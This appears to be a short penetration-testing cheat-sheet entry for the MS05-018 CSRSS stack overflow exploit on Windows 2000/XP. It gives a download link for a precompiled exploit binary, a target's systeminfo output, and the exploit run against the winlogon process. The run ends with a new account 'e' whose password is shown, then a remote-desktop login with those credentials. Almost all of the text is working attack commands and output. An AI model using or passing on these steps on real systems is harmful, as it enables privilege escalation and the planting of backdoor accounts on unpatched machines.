ms05-018
Works for Windows 2K SP3/4 | Windows XP SP1/2
Download Ms05-018.exe:
https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows%E6%8f%90%e6%9d%83%e5%b7%a5%e5%85%b7/ms05018%e2%80%94csrss.exe%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8/ms05018%e2%80%94csrss.exe%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8/tool
C:\windows\system32>systeminfo
Host Name:                 vulnbox
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 1 Build 2600
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model Stepping 2 GenuineIntel ~3457 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;中文版 (States)
Input Locale:              en-us;中文版 (States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: Q147222
                           [03]: KB893803v2 - Update

C:\Inetpub\wwwroot>ms05-018.exe
ms5.exe
ms05-018 Windows CSRSS.EXE Stack Overflow Exp v1.0
Affect: Windows SP3/SP4 (all language)
Coded by Eyas <eyas at xfocus.org> ---> http://www.xfocus.net
Compile by ICESKYSL [IST] ---> www.iceskysl.net
Usage: ms5.exe pid
[+] pid=440 Process=winlogon.exe

C:\Inetpub\wwwroot>ms05-018.exe 440
ms5.exe 440
ms05-018 Windows CSRSS.EXE Stack Overflow Exp v1.0
Affect: Windows SP3/SP4 (all language)
Coded by Eyas <eyas at xfocus.org> ---> http://www.xfocus.net
Compile by ICESKYSL [IST] ---> www.iceskysl.net
[+] FreeConsole OK.
[+] AllocConsole OK.
[+] Get Console Title OK: "ms5.exe"
[+] Bingo! Found hwnd=70038
[+] Start search "FF E4" in ntdll.dll
[+] Found "FF E4" (jmp ESP) in 77fb59cc [ntdll.dll]
[+] CreateFileMapping OK!
[+] MapViewOfFile OK!
[+] Send exploit!
[+] Done. It's successful, add user: username=e password=asd#321

[email protected]:~# rdesktop -u e -p asd#321 x.x.x.x
Windows XP SP1 Privilege escalation